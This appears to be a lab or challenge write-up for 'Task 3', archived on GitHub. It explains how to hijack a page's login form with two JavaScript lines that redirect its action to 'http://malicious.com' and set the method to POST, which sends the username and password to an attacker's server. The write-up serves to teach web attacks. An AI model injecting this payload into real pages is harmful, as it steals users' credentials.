Skip to content
This repository has been archived by the owner on Jun 2, 2022. It is now read-only.

Latest commit

 

History

History
23 lines (14 loc) · 1.24 KB

TASK_3.md

File metadata and controls

23 lines (14 loc) · 1.24 KB
Raw

Task 3 [Try Now]

Objectives:

  1. Post the Username and Password to Attacker Controlled Server

By default, the form is submitted to the url mentioned in action attribute of form tag. If it's not set, the action will defaults to current url

image

Luckily here button behaviour is set to Submit. Also if you see there is only one form in whole page. So you can use Document.forms to get an array of forms. In this case, we have only 1 form. So modifying it would be like this

document.forms[0].action = "http://malicious.com";

Now we are also supposed to POST the data. In form you can set the methods using method=POST attribute. If this is not mentioned, it defaults to GET method. READ MORE

document.forms[0].method = "POST";

For POC, Click Here